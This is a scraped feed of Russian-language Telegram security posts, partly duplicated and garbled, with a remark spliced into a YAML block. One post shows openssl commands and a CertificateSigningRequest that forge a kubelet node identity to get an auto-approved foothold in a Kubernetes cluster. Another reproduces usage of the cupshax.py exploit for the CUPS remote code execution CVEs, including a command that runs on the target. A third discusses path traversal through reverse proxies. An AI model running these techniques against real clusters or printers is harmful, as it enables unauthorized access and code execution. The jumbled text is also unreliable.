Кому интересно продолжение:
Бинго мы в кластере, на всякий там, в последнем, авто апрув флагами стоит ;)
openssl genrsa -out node.key 2048
openssl req -new -key node.key -out node.csr -subj "/CN=system:node:wars/O=system:nodes"
cat node.csr |base64 -w0
apiVersion: certificates.k8s.io/v1Тут же получаем авто апрув от kube-controller-manager :)
kind: CertificateSigningRequest
metadata:
name: node-csr
spec:
request: base64_encoded=
signerName: kubernetes.io/kube-apiserver-client-kubelet
usages:
- digital signature
- key encipherment
- client auth
Бинго мы в кластере, на всякий там, в последнем, авто апрув флагами стоит ;)
Знайте, я сторонник NANO;
Если вы пользуетесь vi, то без вот этой х*рни вам будет ппц, если у вас маунтится конфиг в контейнер через -v, а вы на хосте редактируете файл, у вас черт возьми измениться инод файла и на лету контейнер, например nginx не увидит этого изменения (ls -i в помощь);
Если вы пользуетесь vi, то без вот этой х*рни вам будет ппц, если у вас маунтится конфиг в контейнер через -v, а вы на хосте редактируете файл, у вас черт возьми измениться инод файла и на лету контейнер, например nginx не увидит этого изменения (ls -i в помощь);
This media is not supported in your browser
VIEW IN TELEGRAM
В свете последних событий с хомяком :)
🥰2😁1
Forwarded from ScriptKiddieNotes
Тут какой-то залетный задал вопрос https://t.iss.one/ScriptKiddieNotesChat/3460
Вообще, вопрос интересный. И я начал вспоминать, что же я знаю про "secondary context path traversal".
Как я всегда это понимал - это когда ты не напрямую проводишь атаку типа path traversal на веб-приложение, а когда при этом имеет место быть прокладка в виде прокси/шлюза. И чтобы визуально добиться и достать результат надо попотеть, ибо не так просто подобрать правильный path routing.
Натыкался на нечто подобное, когда в качестве прокси выступал nginx. Но чет не осилил.
Тема не то, чтобы новая, но вполне имеет место быть. Просто автоматикой не детектится, лол)
Материалы по теме:
https://github.com/GrrrDog/weird_proxies
https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency
https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8
#bb
Вообще, вопрос интересный. И я начал вспоминать, что же я знаю про "secondary context path traversal".
Как я всегда это понимал - это когда ты не напрямую проводишь атаку типа path traversal на веб-приложение, а когда при этом имеет место быть прокладка в виде прокси/шлюза. И чтобы визуально добиться и достать результат надо попотеть, ибо не так просто подобрать правильный path routing.
Натыкался на нечто подобное, когда в качестве прокси выступал nginx. Но чет не осилил.
Тема не то, чтобы новая, но вполне имеет место быть. Просто автоматикой не детектится, лол)
Материалы по теме:
https://github.com/GrrrDog/weird_proxies
https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency
https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8
#bb
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM